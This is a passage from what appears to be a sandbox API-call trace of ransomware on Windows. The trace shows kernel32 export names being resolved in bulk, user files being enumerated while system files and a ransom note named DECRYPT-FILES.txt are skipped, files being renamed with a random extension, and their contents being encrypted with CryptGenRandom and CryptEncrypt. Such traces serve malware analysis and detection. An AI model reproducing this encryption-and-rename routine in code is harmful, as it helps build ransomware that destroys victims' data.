returned="CreateMutexExA" [0082.283] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.283] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.283] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.283] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.283] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.283] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.283] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.283] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.283] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.283] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.284] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.284] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.284] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.284] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.284] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.284] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.284] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.284] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.284] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.284] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.284] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.284] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.284] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.284] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.284] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.284] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.284] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.284] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.284] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.284] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.285] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.285] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.285] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.285] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.285] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.285] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.285] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.285] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.285] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.285] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.285] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.285] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.285] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.285] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.285] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.285] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.285] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.285] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.285] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.286] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.286] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.286] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.286] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.286] lstrlenA (lpString="DELETEATOM") returned 10 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.286] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.286] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.286] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.286] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.286] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.286] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.286] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.286] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.286] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.286] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.286] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.286] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.287] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.287] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.287] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.287] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.287] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.287] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.287] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.287] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.287] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.287] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.287] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.287] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.287] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.287] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.287] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.287] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.287] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.287] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.287] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.288] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.288] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.288] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.288] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.288] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.288] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.288] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.288] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.288] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.288] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.288] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.288] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif") returned 65 [0082.288] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif.RsVsF") returned 71 [0082.289] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mw_4g5sx p7wgze.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif.RsVsF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mw_4g5sx p7wgze.gif.rsvsf"), dwFlags=0x0) returned 1 [0082.289] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.290] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.290] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.290] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc251ab50, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0x5e5d79e0, ftLastAccessTime.dwHighDateTime=0x1d4d05c, ftLastWriteTime.dwLowDateTime=0x5e5d79e0, ftLastWriteTime.dwHighDateTime=0x1d4d05c, nFileSizeHigh=0x0, nFileSizeLow=0xea43, dwReserved0=0x0, dwReserved1=0x0, cFileName="NdoDnsxj.bmp", cAlternateFileName="")) returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="autorun.inf") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="boot.ini") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="desktop.ini") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="ntuser.dat") returned -1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="iconcache.db") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="bootsect.bak") returned 1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="ntuser.dat.log") returned -1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="thumbs.db") returned -1 [0082.290] lstrcmpiW (lpString1="NdoDnsxj.bmp", lpString2="Bootfont.bin") returned 1 [0082.290] lstrlenW (lpString="NdoDnsxj.bmp") returned 12 [0082.290] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0082.290] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0082.290] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0082.291] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0082.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.291] lstrlenW (lpString="NdoDnsxj.bmp") returned 12 [0082.291] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="NdoDnsxj.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp" [0082.291] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndodnsxj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.291] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=59971) returned 1 [0082.291] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.291] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.291] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.291] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.291] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.292] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.292] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.293] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.293] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.294] CloseHandle (hObject=0x444) returned 1 [0082.294] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.294] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.295] CloseHandle (hObject=0x0) returned 0 [0082.295] CloseHandle (hObject=0x440) returned 1 [0082.295] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.295] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.296] GetTickCount () returned 0x114d0c7 [0082.296] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.296] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.296] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 